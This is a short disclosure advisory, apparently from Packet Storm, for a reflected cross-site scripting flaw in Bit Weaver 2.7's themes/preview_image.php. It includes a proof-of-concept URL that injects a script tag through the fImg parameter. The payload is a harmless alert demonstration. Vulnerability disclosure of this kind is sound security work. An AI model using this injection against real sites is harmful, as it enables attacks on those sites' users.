Bit Weaver version 2.7 suffers from a cross site scripting vulnerability.
ab4f4c21c7716420cda3779bb50c1817dfc703df986b81ccc3fe9b5e1af46fce------------------------------------------------------------------------
Software................Bit Weaver 2.7
Vulnerability...........Reflected XSS
Download................http://www.bitweaver.org/
Release Date............7/5/2010
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................John Leitch
Site....................http://cross-site-scripting.blogspot.com/
Email...................john.leitch5@gmail.com
------------------------------------------------------------------------
--Description--
An XSS vulnerability in Bit Weaver 2.7 can be exploited to
execute arbitrary JavaScript.
--PoC--
http://localhost/bitweaver/themes/preview_image.php?fImg=%22%3E%3Cscript%3Ealert(0)%3C/script%3E
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed